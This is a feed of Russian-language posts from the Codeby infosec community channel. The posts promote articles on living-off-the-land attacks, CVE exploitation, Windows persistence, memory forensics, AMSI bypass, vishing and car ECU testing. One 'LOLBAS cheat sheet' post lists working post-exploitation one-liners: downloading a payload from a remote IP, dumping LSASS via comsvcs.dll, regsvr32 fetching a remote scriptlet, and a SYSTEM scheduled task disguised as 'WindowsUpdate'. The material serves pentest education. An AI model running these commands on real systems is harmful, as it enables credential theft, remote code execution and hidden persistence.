34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
🛡 79% атак в 2024-м — без единого вредоносного файла. Как такое возможно?
Представь: атакующий уже внутри сети. EDR молчит. Антивирус не видит угрозы. На диск не упало ни одного подозрительного файла. При этом LSASS уже дампится, а злоумышленник спокойно двигается по сети. Инструменты? Исключительно те, что Microsoft сама поставила с Windows.
Это не фантастика. По данным CrowdStrike Global Threat Report 2025, именно 79% всех зафиксированных атак в 2024 году обошлись без малвари. Для сравнения: в 2019-м таких атак было 40%. Bitdefender по анализу 700 000 инцидентов добавляет: 84% высокоприоритетных атак используют технику Living off the Land.
🔍 Что такое LOTL и почему это работает
Living off the Land — стратегия, при которой атакующий проходит весь kill chain исключительно легитимными системными инструментами. Никакого кастомного бэкдора, никакого RAT. Только подписанные Microsoft бинарники — LOLBins.
Почему это так эффективно? Три причины:
• Доверие по умолчанию — certutil.exe, mshta.exe, rundll32.exe подписаны Microsoft, сидят в белых списках AppLocker и не вызывают срабатываний EPP.
• Нет файловых IOC — хэши совпадают с легитимными. Сигнатурный анализ просто бессилен.
• Дёшево в поддержке — атакующему не нужно писать и поддерживать собственный инструментарий.
Проект LOLBAS на GitHub каталогизировал уже более 200 Windows-бинарников с задокументированным потенциалом злоупотребления.
⚙️ Реальный пример: certutil в атаках 2025 года
Возьмём конкретный кейс. Группа Storm-2460 в 2025-м использовала certutil.exe для загрузки вспомогательных компонентов на ранних стадиях кампании PipeMagic. Параллельно эксплуатировалась CVE-2025-29824 — Use After Free в драйвере Windows CLFS, CVSS 7.8 — для повышения привилегий. Цели: США, Испания, Венесуэла, Саудовская Аравия.
Штатная утилита управления сертификатами умеет качать файлы из интернета (-urlcache -split -f) и кодировать/декодировать Base64 (-encode / -decode). Именно это и эксплуатируют.
🗺 Карта темы: где LOTL встречается в kill chain
LOTL — не отдельный трюк, а философия построения всей цепочки атаки. В MITRE ATT&CK ядро техники — T1218 System Binary Proxy Execution. Но реальная кампания покрывает куда больше:
1. Execution — PowerShell, cmd.exe, WMI
2. Lateral Movement — WMI, PSRemoting, DCOM
3. Credential Access — дамп LSASS через легитимные утилиты
4. Persistence — реестр, планировщик, COM-hijacking
5. Defense Evasion — обход AMSI, Defender, EDR
Каждый этап kill chain закрывается инструментами, которые уже стоят в системе. Именно поэтому классические средства защиты проигрывают — они ищут чужеродное, а здесь всё «своё».
Полный разбор команд, техник обхода EDR, BYOVD-атак и закрепления через COM-hijacking — в статье по ссылке ниже.
https://codeby.net/threads/living-off-the-land-ataki-windows-polnoye-rukovodstvo-po-lolbas-obkhodu-edr-i-post-ekspluatatsii-bez-storonnikh-instrumentov.92849/
⚡️ Окно атаки схлопнулось до нуля: что это значит для тебя
В 2018 году от публикации CVE до первого зафиксированного эксплойта проходило в среднем 756 дней. Сегодня этого времени нет.
По данным VulnCheck, в 2025 году 28,96% уязвимостей из каталога Known Exploited Vulnerabilities эксплуатировались в день публикации CVE или раньше. Не через неделю. Не через сутки. В момент, когда advisory ещё не дочитан. Unit 42 фиксирует: сканирование на свежую CVE стартует через 15 минут после появления записи. CrowdStrike замерил среднее время латерального перемещения после первичного доступа — 29 минут.
🔍 Почему всё так ускорилось?
Три фактора, которые изменили правила игры:
1. Patch diffing стал тривиальным. Вендор публикует патч — атакующий скачивает коммит, запускает diff, находит изменённые функции. AI-ассистированный анализ сократил этот процесс до часов. По данным HiveSecurity, AI-агенты сгенерировали более 40 рабочих эксплойтов для одной уязвимости за $50.
2. Периметровые устройства — приоритетная цель. Файрволы, VPN, прокси возглавляют список атакуемых технологий в 2025 году. Пример: CVE-2026-3055 (CVSS 9.3) — активная разведка эндпоинта /cgi/GetAuthMethods началась через 3 дня после disclosure, ещё через несколько дней CVE попал в CISA KEV.
3. Вендор патчит в среднем за 15 дней после обнаружения активной эксплуатации. Разрыв между «эксплойт в дикой природе» и «патч доступен» измеряется неделями. И эти недели — в пользу атакующего.
🛠 Как выглядит полный конвейер атаки?
Весь цикл от строчки в NVD до рабочего шелла укладывается в семь фаз:
• Мониторинг и триаж CVE по CVSS, EPSS, affected products
• Анализ advisory и patch diffing изменённого кода
• Воспроизведение краша и настройка окружения
• Разработка PoC: контроль RIP, ROP-цепочки, обход митигаций
• Эксплуатация в вебе: десериализация, SSTI, SSRF-to-RCE
• Weaponization через ysoserial, phpggc, gadget chains
• Интеграция в пентест: стабильный шелл в обход EDR
💡 Важный вывод для защитников: если ты строишь vulnerability management только на CVSS-скоре и ежемесячных циклах патчинга — ты структурно опаздываешь. Приоритизация по факту эксплуатации (CISA KEV, VulnCheck KEV) критичнее теоретической оценки серьёзности.
В год регистрируется более 25 000 новых CVE — около 70 в день. При таком потоке ключевой навык — не читать каждую запись, а делать быстрый триаж по критериям, релевантным твоему скоупу.
Полный разбор каждой фазы — в статье.
https://codeby.net/threads/cve-eksploit-razrabotka-polnyi-tsikl-ot-publikatsii-uyazvimosti-do-rabochego-shella-metodologiya-i-instrumenty-2025-2026.92843/
Пять минут до того, как ваш доступ исчезнет навсегда
Представь ситуацию: недели разведки, социальной инженерии, обхода периметра — и вот он, живой beacon. Потом пользователь перезагружается. Или EDR убивает процесс. Или IT прилетает с патчем. И ты начинаешь всё сначала.
Именно поэтому профессиональные APT-группы вкладываются не в initial access, а в многослойное закрепление. Volt Typhoon сидел в критической инфраструктуре больше пяти лет — необнаруженным. Salt Typhoon действовал аналогично. Это не магия — это системная работа с persistence.
🔑 Реестр: от очевидного к невидимому
Run-ключи — HKCU\Software\Microsoft\Windows\CurrentVersion\Run — знает каждый EDR на планете. Windows Defender, CrowdStrike, SentinelOne алертят на новые записи мгновенно, особенно если путь ведёт в Temp или Public. Но у этой техники есть неочевидное применение: decoy. Аналитик находит знакомый артефакт, удаляет, закрывает тикет — и считает инцидент закрытым. А ты продолжаешь работать через другой канал.
Куда интереснее — менее мониторируемые ключи. Image File Execution Options (IFEO) позволяет зарегистрировать «отладчик» для любого процесса: при его запуске система выполнит твой код вместо оригинала. Но есть вариант тише: флаг GlobalFlag=0x100 в том же ключе плюс VerifierDlls — и твоя DLL грузится при каждом старте процесса. Autoruns от Sysinternals по умолчанию это не показывает. Тишина.
⚙️ Планировщик, WMI и Ghost Tasks
Scheduled Tasks — рабочая лошадка red team. Но настоящая жемчужина — Ghost Tasks: задачи, которые существуют в реестре, но отсутствуют в %SystemRoot%\System32\Tasks. Стандартные инструменты их не видят. schtasks /query возвращает пустоту. Task Scheduler GUI — тоже. А задача выполняется.
WMI-подписки работают на уровне ниже — через событийную модель самой Windows. Триггером может быть что угодно: вход пользователя, запуск конкретного процесса, изменение файла. Payload не живёт в реестре как строка — он хранится в репозитории WMI (%SystemRoot%\System32\wbem\Repository). Большинство инструментов форензики туда не смотрит по умолчанию.
🎭 COM-hijacking: persistence без единой новой записи в Run-ключах
Каждый раз, когда Windows ищет COM-объект, она проверяет HKCU\Software\Classes\CLSID раньше, чем HKLM. Без прав администратора. Найди CLSID, который вызывается легитимным процессом (например, Task Scheduler или Explorer), зарегистрируй свою DLL в HKCU — и при каждом вызове этого объекта твой код выполняется в контексте легитимного процесса. Никаких новых процессов, никаких подозрительных записей автозапуска.
Четыре техники, разные уровни скрытности, разные требования к привилегиям — полный разбор с командами, OPSEC-соображениями и артефактами для blue team читай в статье на форуме 👇
https://codeby.net/threads/tekhniki-zakrepleniya-v-windows-reyestr-planirovshchik-wmi-i-com-hijacking-dlya-red-team.92841/
🚩 Новые задания на платформе HackerLab!
⚙️ Категория Реверс-инжиниринг — Секрет Максима
——————————————
🗂 В архив добавлены задания + райтапы:
— Веб - devops 300k/s
— Веб - Просто найди его
Приятного хакинга!
Три дня на одной машине — и два месяца потерянной мотивации
Именно столько стоит неправильный выбор стартовой платформы для пентеста. Автор статьи завис на машине «Lame» на HackTheBox, не понимая, почему эксплойт не срабатывает. Причина оказалась простой: он пытался сделать privilege escalation, не зная, что это такое. Фундамент был пропущен.
🔍 Главная ошибка новичков — воспринимать HackTheBox и TryHackMe как конкурентов. Это не два варианта на выбор, а два последовательных этапа. PentesterLab закрывает третью задачу, VulnHub — четвёртую. Спрашивать «какая платформа лучше?» — всё равно что спрашивать «что лучше: учебник или экзамен?». Ответ зависит от того, где вы сейчас.
🎓 TryHackMe — это автошкола. Каждая комната сначала объясняет концепцию, потом даёт задание. Виртуалки запускаются прямо в браузере — не нужно настраивать VPN и ставить Kali. Learning Path «Jr Penetration Tester» проведёт от базовых сетевых концепций до веб-уязвимостей за 60–80 часов практики. Платформа ведёт за руку — и это её главная сила на старте.
Но есть обратная сторона: THM подсказывает каждый шаг. После прохождения Learning Path вы знаете инструменты, но не умеете думать самостоятельно. На реальном проекте подсказок нет.
🔥 HackTheBox — городская дорога без инструктора. Получаете IP-адрес машины. Всё. Никаких инструкций. Именно так выглядит реальный пентест: вот скоуп, вот время — действуйте. Даже машины уровня Easy предполагают, что вы уже умеете провести полное сканирование через nmap -sC -sV -p-, найти эксплойт, адаптировать его и поднять привилегии через linpeas.sh.
Хорошая новость: у HTB есть HTB Academy — структурированный формат с возможностью сдать сертификации CPTS и CBBH. Экзамены практические: никаких тестов с галочками, только hands-on работа и написание профессионального отчёта.
🌐 PentesterLab занимает нишу, которую не покрывает ни одна из двух предыдущих платформ — глубокое понимание механики веб-уязвимостей. Если THM говорит «введите ' OR 1=1 --», то PentesterLab объясняет, почему именно эта строка ломает SQL-запрос, как устроен парсинг на стороне сервера и какие варианты обхода фильтров существуют. Незаменим для тех, кто метит в веб-пентест или bug bounty.
Итого — рабочая последовательность для большинства:
• TryHackMe — фундамент, базовые концепции, первые 60–80 часов
• HTB Academy — структурированное углубление, подготовка к сертификациям
• HackTheBox — самостоятельная работа с реальными машинами
• PentesterLab — специализация по вебу
В полной статье — разбор VulnHub, конкретные машины для первого опыта на каждой платформе и честный ответ на вопрос, какую из них стоит брать платно.
https://codeby.net/threads/hackthebox-vs-tryhackme-vs-pentesterlab-vs-vulnhub-kakuyu-platformu-dlya-pentesta-vybrat-v-2025.92833/
Почему малварь прячется в RAM — и как её оттуда достать
За последний год через одну лабораторию прошло больше двадцати дампов с реальных инцидентов — и во всех случаях малварь жила исключительно в оперативной памяти. Ни одного файла на диске. Классическая дисковая форензика дала бы ноль.
🔍 Fileless-атаки, reflective DLL injection, Cobalt Strike beacon в RWX-регионе легитимного svchost.exe — для антивируса и EDR это выглядит как обычная работа системы. Но в оперативной памяти они оставляют следы, которые никуда не деваются.
Почему RAM важнее диска при реагировании
Образ диска на 250+ ГБ снимается часами. Дамп RAM на 8–32 ГБ — за минуты. Но дело не только в скорости.
Оперативная память хранит то, чего на диске нет в принципе:
• Расшифрованный payload — малварь шифрует себя на диске, но в RAM работает в открытом виде
• Инжектированный код — Process Injection (T1055) файлов не оставляет, только RWX-регионы в чужом адресном пространстве
• Скрытые процессы — руткит выдёргивает процесс из списка, но pool-теги остаются в физической памяти
• Активные C2-соединения — с PID, портами и IP, которые лог файервола мог не записать
• Хэши и билеты Kerberos — прямо в памяти lsass.exe
🛠 Volatility 3: что изменилось
Главная ловушка для тех, кто учился по старым руководствам: в тройке нет --profile. Вместо него — символьные таблицы в формате ISF, которые фреймворк стягивает сам при первом запуске. Не нужно угадывать точный билд Windows — Volatility 3 определяет его автоматически.
Синтаксис стал чище: vol -f dump.raw windows.pslist вместо громоздкого vol.py --profile=Win10x64_18362 pslist. Минорные билды Windows поддерживаются без обновления фреймворка.
⚠️ Ключевой момент про снятие дампа
Дамп снимается до перезагрузки — это очевидно, но на практике именно здесь теряют артефакты. Перезагрузили хост — потеряли всё.
На Windows используется WinPmem: winpmem_mini_x64_rc2.exe output.raw. Сразу после снятия фиксируется контрольная сумма: sha256sum output.raw > output.raw.sha256. Это не формальность — без chain of custody отчёт не примут ни в суде, ни на review у заказчика.
💡 Что реально разделяет pslist и psscan
Большинство руководств перечисляют плагины, не объясняя разницу. pslist идёт по двусвязному списку ядра — руткит может выдернуть оттуда запись. psscan сканирует физическую память по pool-тегам — и находит то, что скрыто. Расхождение между выводами двух плагинов — красный флаг.
Полный workflow расследования: от снятия дампа до IoC для отчёта — в статье.
https://codeby.net/threads/analiz-dampov-pamyati-volatility-3-prakticheskii-workflow-obnaruzheniya-malvari-i-in-yektsii.92825/
XSS — это не просто alert(1)
Это уязвимость, которая может привести к краже сессии и полному захвату аккаунта.
Разобрали основные типы XSS и как от них защищаться — в карточках выше
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
RCE за три шага: как читать CVE advisory и не останавливаться на CVSS-балле
Большинство пентестеров смотрят на новую CVE, запоминают цифру 9.8 и идут дальше. Между тем в тексте advisory уже лежит готовый рецепт эксплойта — если знать, куда смотреть.
🔍 Три фазы для любого PHP/JS-стека:
1. Декомпозиция advisory — читать NVD, GHSA и CISA KEV. Вектор AV:N/AC:L/PR:N/UI:N сразу говорит: pre-auth RCE, максимальный приоритет
2. Patch diffing — коммит из GHSA показывает точку входа. Замена unserialize() или dol_eval() — ваш маяк
3. Цепочка до PoC — CWE-классификация как карта: CWE-502 → gadget chain, CWE-22 → доставка payload
Разобраны CVE-2025-32432 в Craft CMS (CVSS 10.0, CISA KEV) и CVE-2025-55182 в React Server Components — от advisory до шелла.
https://codeby.net/threads/ekspluatatsiya-cve-v-veb-prilozheniyakh-ot-chteniya-advisory-do-rce-za-tri-shaga.92809/
Charming Kitten не взламывает системы — они взламывают людей
Недели переписки в WhatsApp, легитимные PDF, приглашения на реальные конференции. И только потом — ссылка. Ни малвари, ни эксплойтов. Просто украденная сессия и полный доступ к Microsoft 365.
APT42 (Charming Kitten, IRGC-IO) работает иначе:
• Фейковые аккаунты журналистов и организаторов конференций выстраивают доверие неделями
• Фишинговые киты перехватывают TOTP-код в реальном времени — MFA не спасает
• Инфраструктура на Google Sites и Cloudflare Workers не триггерит блокировки
Стандартный SOC заточен под вредоносные вложения и подозрительные домены. APT42 не даёт ни того, ни другого — атака идёт на личный Gmail, где корпоративная защита не работает.
Полный kill chain с маппингом на MITRE ATT&CK и примерами детектирования в SIEM:
https://codeby.net/threads/apt42-sotsial-naya-inzheneriya-kak-irgc-khakery-obkhodyat-mfa-i-kradut-uchetnyye-dannyye-bez-malvari.92779/
За апрель на форуме вышло 111 материалов. Мы посмотрели Метрику и увидели закономерность, которую не покажет ни один рейтинг «по просмотрам».
Самая читаемая статья месяца, разбор реальных техник применения LLM в атакующих операциях (569 уникальных читателей). Без хайпа про «ИИ заменит пентестера»: конкретные сценарии разведки, генерация payload под редкий таргет, и та самая граница, за которой модель начинает галлюцинировать и портить операцию.
https://codeby.net/threads/ii-v-penteste-real-nyye-tekhniki-ispol-zovaniya-llm-v-atakuyushchikh-operatsiyakh.92644/
Но интереснее смотреть не на трафик, а на глубину. Техническая статья про kernel rootkit в Linux, перехват syscall table, модификация VFS, сокрытие процессов через /proc, собрала «всего» 280 посетителей. А среднее время чтения 1:37. Для kernel-level материала это аномалия: обычно такие вещи смотрят по диагонали и закрывают на второй странице листинга. Те, кто пришёл, сидели с кодом.
https://codeby.net/threads/kernel-rootkit-linux-perekhvat-syscall-table-modifikatsiya-vfs-i-sokrytiye-protsessov-ot-koda-do-detektirovaniya.92640/
То же самое с апрельским Zero-Day в Telegram (ZDI-CAN-30207, CVSS 9.8). 413 посетителей и показатель отказов 11%, читатели уходили только после того, как дочитывали разбор вектора до конца.
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
А вот что неожиданно: сравнение OSCP, CEH, eJPT и PNPT, казалось бы, «попсовая» тема про серты, дала средний retention 3:06. Потому что без маркетинга: стоимость, формат экзамена, что реально спрашивают на собеседованиях в РФ, какая серта открывает двери, а какая висит красивым PDF.
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/
И единственная статья из топа, которая уже собирает органику из Яндекса (CTR 7.7%), roadmap в пентест от практика. Без «выучите тысячи инструментов», с привязкой к реальным вопросам на собесах в 2026.
https://codeby.net/threads/kak-stat-pentesterom-s-nulya-roadmap-ot-cheloveka-kotoryi-proshel-etot-put.92680/
Что из этого следует: на форум приходят не за «новостями из мира ИБ», а за материалом, который можно применить в понедельник на работе. Кто-то дочитывает про rootkit до последнего листинга, кто-то разбирается с сертификацией под конкретную вакансию, кто-то ищет, как устроен CVSS 9.8 изнутри.
А вам что из апрельского зашло сильнее, и что применили в работе?
Комбинация, которая обычно не собирается в одном резюме: сетевик с действующим CCNA, 15 лет практики, удалённый формат по умолчанию и четыре рабочих языка — русский, английский, грузинский, греческий.
На форуме Codeby появился специалист, который закрывает связку «сети — системное администрирование — кибербез — техподдержка» без дробления на четыре разные роли. За плечами — полтора десятка лет в проде и действующие сертификаты Cisco и Microsoft.
Такой профиль имеет смысл присмотреть, если вы:
— держите небольшой интегратор или MSP и не готовы выделять отдельных людей под каждое направление;
— работаете с клиентами на Кипре, в Греции или в Грузии и регулярно упираетесь в языковой барьер;
— ищете внешние руки для сетевой инфраструктуры без найма сетевика в штат;
— закрываете NOC/поддержку по дежурствам и нужен универсал, который не путается в вопросах безопасности.
Специалистов с таким стажем в сетях обычно быстро «поднимают» в архитекторы или замыкают на одного вендора. Универсалы-удалёнщики со свежими сертификатами и несколькими рабочими языками — скорее исключение, чем норма.
Полный профиль с контактами — в теме резюме: https://codeby.net/threads/ishchu-rabotu-v-sfere-it.92754/
Ищете других кандидатов или хотите разместить вакансию — раздел «Карьера в ИБ»: https://codeby.net/forums/kar-yera-v-ib-vakansii-i-proyekty.23/
Beacon жив — но через 60 секунд его нет
Initial access получен, C2 поднят. Потом `MsMpEng.exe` режет нагрузку, Script Block Logging пишет каждый чих, AppLocker не даёт запустить ничего. Знакомо?
🔍 Windows-защита — четыре независимых эшелона:
• Статический движок Defender — сигнатуры, ML, PE-фичи
• AMSI — runtime-перехват в адресном пространстве процесса
• ETW — телеметрия для EDR на kernel-level
• AppLocker — application whitelisting на уровне user-mode
Ключевой инсайт: охранник сидит в одной камере с заключённым. amsi.dll загружается в каждую PowerShell-сессию с теми же привилегиями, что и вредоносный код. Классический патчинг AmsiScanBuffer оставляет следы в .text-секции — EDR это видит. Hardware breakpoints через DR0–DR3 обходят сканирование без записи в память.
https://codeby.net/threads/obkhod-windows-defender-i-amsi-prakticheskii-gaid-po-defense-evasion-dlya-red-team.92763/
LOLBAS шпаргалка: пост-эксплуатация Windows штатными средствами
EDR снёс инструментарий, но cmd/PowerShell живы — Windows сама несёт всё нужное:
• curl.exe -s -o C:\Temp\f.exe http://IP/f.exe — загрузка файла (Win10 1803+), сигнатуры слабее чем на certutil
• rundll32.exe comsvcs.dll, MiniDump C:\Temp\lsass.dmp full — дамп LSASS без Mimikatz, нужен SeDebugPrivilege
• regsvr32.exe /s /n /u /i:http://IP/payload.sct scrobj.dll — Squiblydoo, обход AppLocker
• msbuild.exe C:\Temp\payload.csproj — компиляция C# inline, обход AppLocker
• schtasks /create /tn "WindowsUpdate" /tr "beacon.exe" /sc onlogon /ru SYSTEM /f — persistence без PowerShell
ATT&CK-маппинг, флаги и ограничения (WDAC, Server Core) — в полной шпаргалке:
https://codeby.net/threads/lolbas-shpargalka-komandy-post-ekspluatatsii-windows-bez-storonnikh-instrumentov.92752/
11 строк кода — и ваша сессия уже у атакующего
Ставите расширение-переводчик. Оно честно переводит страницы — и в фоне перехватывает каждый Authorization-заголовок, сливая Bearer-токен через fetch(). Никакого 0-day — только API, который браузер сам отдал.
🔍 Расширение с правом <all_urls> видит весь трафик: банк, корпоративный портал, почту. Обработчик onBeforeSendHeaders получает Cookie, Authorization, X-CSRF-Token до отправки на сервер. Жертва не замечает ничего.
⚠️ 42% вредоносных расширений с 2018 года злоупотребляли webRequest. Manifest V3 вектор не закрыл. Двухфакторка не спасает — расширение внутри периметра доверия браузера.
Полный разбор с PoC-кодом и семплами из Chrome Web Store:
https://codeby.net/threads/kak-brauzernyye-rasshireniya-kradut-dannyye-webrequest-declarativenetrequest-i-tekhniki-perekhvata-trafika.92749/
22 секунды — именно столько нужно атакующему, чтобы один звонок превратился в полномасштабный инцидент
Это не метафора. По данным Mandiant M-Trends 2026, между первым звонком мошенника и передачей доступа следующей группировке проходит в среднем 22 секунды. Не минуты — секунды.
📞 И пока компании инвестируют миллионы в файрволы и EDR-системы, атакующие просто звонят на хелпдеск и представляются сотрудниками. Scattered Spider — одна из самых результативных группировок последних лет — поднималась от первого звонка до доменного администратора менее чем за 40 минут. Без единой строки вредоносного кода.
Голосовой фишинг впервые обогнал email как главный вектор начального доступа. Классические фишинговые письма упали до 6% подтверждённых случаев первичного проникновения, а вишинг вырос до 11% — а в облачных инцидентах и вовсе до 23%. Тренд очевиден: технические барьеры растут, и атака смещается туда, где барьеров нет — в человека.
🎯 Почему это работает? Не потому что люди глупы. Атаки вписываются в нормальные рабочие процессы: сброс пароля, согласование платежа, обновление ПО. Каждое действие выглядит рутинным — и именно поэтому срабатывает. По данным Unit 42, 36% всех инцидентов в 2025 году начались с социальной инженерии.
Методы давно вышли за рамки «нигерийских писем». Вот как выглядит карта актуальных атак:
• Вишинг — звонок на хелпдеск, убедительная легенда, сброс MFA-токена за три минуты
• Deepfake-имперсонация — голос или видео «руководителя», который просит срочно перевести деньги
• ClickFix — браузер показывает «ошибку» и предлагает вставить команду в терминал для «исправления»
• QR-фишинг — через linked devices в Signal или Telegram, применяется APT-группировками
• Обход KYC — дипфейки и инъекции видеопотока для обмана систем идентификации
🔐 Что с этим делать? Несколько принципов, которые реально работают:
1. Верификация по второму каналу. Позвонил «руководитель» с просьбой срочно что-то сделать — перезвони ему сам по номеру из корпоративной базы.
2. Нулевое доверие к срочности. «Срочно», «немедленно», «иначе всё рухнет» — классические триггеры давления. Именно в этот момент нужно замедлиться.
3. Аппаратные ключи вместо OTP-кодов. Их нельзя «сбросить» по телефону — физический токен закрывает главный сценарий вишинга.
⚡️ Парадокс 2026 года: чем лучше технические средства защиты, тем ценнее становится атака на человека. Инвестиции в осведомлённость сотрудников — уже не «мягкий» навык, а критическая инфраструктура безопасности.
Полный разбор всех методов, техник APT-групп и практических мер защиты — в статье.
https://codeby.net/threads/sotsial-naya-inzheneriya-2026-polnaya-karta-metodov-atak-i-zashchity.92848/
🔌 Внутри автомобиля — до 150 компьютеров. И каждый можно взломать
Современный автомобиль — это не машина с электроникой. Это сеть из 70–150 ECU (электронных блоков управления), которые управляют всем: от впрыска топлива до адаптивного круиз-контроля. У каждого блока — своя прошивка, свои протоколы, свои уязвимости.
🎯 Точка входа, которую видит атакующий первой — OBD-II порт. Тот самый 16-пиновый разъём под приборной панелью, к которому подключается любой механик с диагностическим сканером. С точки зрения MITRE ATT&CK — это классический Hardware Additions (T1200): физический доступ к внутренней шине автомобиля через штатный интерфейс.
Но тут важно понимать разницу, которую путают даже в профессиональных материалах. OBD-II — это физический уровень: разъём, пины, питание. UDS (Unified Diagnostic Services, ISO 14229) — протокол прикладного уровня, который течёт поверх CAN-шины. Грубо: OBD-II — розетка, UDS — то, что через неё передаётся.
⚙️ Через UDS исследователь может переключать диагностические сессии, читать коды ошибок, получать доступ к идентификаторам данных и — при определённых условиях — полностью перепрошить блок. Всё это через стандартные сервисы: 0x10 (переключение сессии), 0x34 (запрос загрузки), 0x36 (передача данных).
Пример из практики: отправляете на диагностический ID двигателя (0x7E0) запрос 02 10 03 — переключение в расширенную сессию. Получаете 02 50 03 — успех. Или 03 7F 10 22 — отказ с кодом NRC 0x22: блок решил, что условия не выполнены (например, автомобиль движется).
🔒 Казалось бы, gateway-ECU в современных машинах фильтрует запросы и ограничивает маршрутизацию. Через OBD-порт реально видно 5–15 блоков из потенциальных 80+. Но даже этот ограниченный набор включает критичные системы: двигатель, ABS, трансмиссию, подушки безопасности.
И вот где начинается самое интересное. Часть производителей допускает переключение в programmingSession без должной аутентификации. Это не теория — это реальные находки в аудитах. Блок, который должен требовать seed-key обмен перед открытием доступа к прошивке, просто... не требует.
Прежде чем идти дальше — важный момент про стенд. Тестирование на живом автомобиле — плохая идея. Случайный CAN-фрейм может заблокировать трансмиссию или сработать подушки безопасности. Правильная схема: ECU на лабораторном стенде, питание 12 В, CAN-шина с терминирующими резисторами 120 Ом на каждом конце.
🛠 Первый шаг любого аудита — пассивный мониторинг. Поднимаете интерфейс: ip link set can0 up type can bitrate 500000, запускаете candump can0 и смотрите реальный трафик между блоками. Уже по дампу видна архитектура сети: активные арбитражные ID, периодичность сообщений, паттерны взаимодействия. Это Network Sniffing (T1040) в чистом виде — и отправная точка для всего дальнейшего исследования.
Полная методология — с hex-примерами, разбором seed-key аутентификации и техниками извлечения прошивок — в статье.
https://codeby.net/threads/pentest-avtomobil-nykh-ecu-ot-obd-ii-porta-do-izvlecheniya-proshivok-cherez-uds.92845/
OSCP или русскоязычный курс пентеста — разбор для тех, кто устал листать вкладки
Два года назад я сидел перед экраном с пятью открытыми вкладками разных курсов и нарастающей тревогой в желудке. OSCP или что-то на русском? Потом я прошёл оба пути — сдал PEN-200 со второй попытки и отучился на русскоязычной платформе. Вот что понял.
🔍 Главное заблуждение: OSCP и русскоязычный курс пентеста — не конкуренты. Это разные инструменты для разных точек входа.
OSCP работает по принципу «брось в воду, плыви». Тебе дают лабораторию из десятков машин и знаменитый девиз Try Harder. Застрял на 10 часов в rabbit hole — это часть обучения. Codeby Academy работает иначе: концепция → демонстрация на стенде → задание → проверка. Не «мягче», а просто другая точка входа.
💡 Почему языковой барьер реально важен на старте
Попытка разобраться с Pass the Hash (T1550.002, Lateral Movement) через английский текст, когда ты параллельно гуглишь, что такое NTLM — это не обучение, а мучение. Каждый новый термин и так перегружает мозг, зачем добавлять сверху ещё и иностранный язык?
🎯 Где принципиальная разница — Active Directory
90% корпоративных сетей в РФ/СНГ построены на AD. OSCP даёт базу по атакам на домен, глубина приходит только в PEN-300. Codeby Academy разбирает AD-атаки подробно прямо в основном курсе:
• Дамп хешей через Mimikatz и secretsdump
• Горизонтальное перемещение через CrackMapExec
• Kerberoasting — перехват TGS-билетов и оффлайн-перебор
Для пентестера в РФ/СНГ это не опционально — это хлеб. По глубине AD-блока Codeby Academy сопоставима с отдельными модулями CRTO.
💸 Цена вопроса — без скрытых платежей
OSCP стартует от $1 649 (курс + 90 дней лабы + 1 попытка экзамена). Хочешь год доступа и 2 попытки — $2 599/год. Провалил экзамен с первого раза (как я) — доплачиваешь. Русскоязычные курсы пентеста обходятся значительно дешевле, включают поддержку и не бьют по кошельку при пересдаче.
🧭 Простой алгоритм выбора
Если ты ещё не уверенно читаешь английские writeup'ы, не знаешь, чем netcat отличается от socat, и AD для тебя пока тёмный лес — начни с русскоязычного курса. Получишь структуру, словарь и уверенность. Потом OSCP перестанет казаться страшным.
Полный разбор обеих программ по тактикам MITRE ATT&CK, сравнение стоимости и честный взгляд от того, кто прошёл оба пути — в статье на форуме.
https://codeby.net/threads/kurs-po-pentestu-dlya-nachinayushchikh-codeby-academy-vs-oscp-chestnoye-sravneniye-ot-praktika.92839/
Почему умные кандидаты проваливают собеседования в ИБ
Больше сотни технических интервью — и один вывод: проваливаются не те, кто мало знает. Проваливаются те, кто готовится не к тому.
🎯 Классическая картина: кандидат наизусть цитирует семь уровней модели OSI, но не может объяснить, на каком уровне работает Wireshark при перехвате HTTP-трафика. А ведь это один из самых частых follow-up вопросов на реальных интервью.
Правильный ход мысли: Wireshark захватывает кадры на канальном уровне (L2), но разбирает данные вплоть до прикладного (L7). Разница принципиальная — и именно такой ход мысли вслух отделяет сильного кандидата от зубрилы.
🔍 Как устроен сам процесс
Собеседование в ИБ — это не один разговор, а цепочка из трёх-пяти этапов, каждый из которых фильтрует по-своему:
• HR-скрининг — проверяют мотивацию, ожидания, минимальный кругозор
• Техническое интервью — сети, криптография, типы атак, инструменты
• Практическое задание — разбор PCAP, анализ CVE или живой кейс
• Финальная встреча — культурный фит, условия, решение
На HR-этапе вас могут спросить буквально «что такое пинг». Звучит смешно, но замешкаться здесь — уже минус в первом впечатлении.
⚡️ Что реально спрашивают на технических интервью
Четыре блока, которые повторяются на каждом junior-собеседовании в ИБ:
1. Сетевые протоколы — TCP/IP, DNS, DHCP, HTTP/HTTPS
2. Криптография — симметричное и асимметричное шифрование, PKI, хеширование
3. Типы атак — XSS, MITM, DDoS, brute force
4. Инструменты — nmap, wireshark, burpsuite хотя бы на уровне «запускал, понимаю вывод»
Про TCP vs UDP ждут не просто «TCP надёжный, UDP быстрый». Сильный ответ звучит иначе: «TCP-handshake (SYN, SYN-ACK, ACK) используется для SYN-flood атак, а UDP-протоколы эксплуатируются в amplification-атаках через DNS или NTP.» Вот это уже ИБ-мышление, а не пересказ учебника.
💡 Главный секрет, который меняет всё
Интервьюер оценивает не только правильность ответа — он смотрит на ход мысли. Не знаете ответ? Проговорите вслух, как бы вы его искали. Для ИБ-специалиста аналитический подход важнее энциклопедических знаний.
Ещё один момент, который топит кандидатов: они не знают компанию. Зайдите на сайт, разберитесь, чем конкретно занимается их ИБ-отдел — это уже выделяет вас среди 80% кандидатов, которые приходят «просто попробовать».
В полной статье — разбор провальных ответов с примерами, конкретный план подготовки за две недели и площадки для практики 👇
https://codeby.net/threads/sobesedovaniye-v-kiberbezopasnost-razbor-voprosov-proval-nyye-otvety-i-plan-podgotovki.92836/
Видеокарта как вектор атаки: почему GPU Rowhammer меняет модель угроз
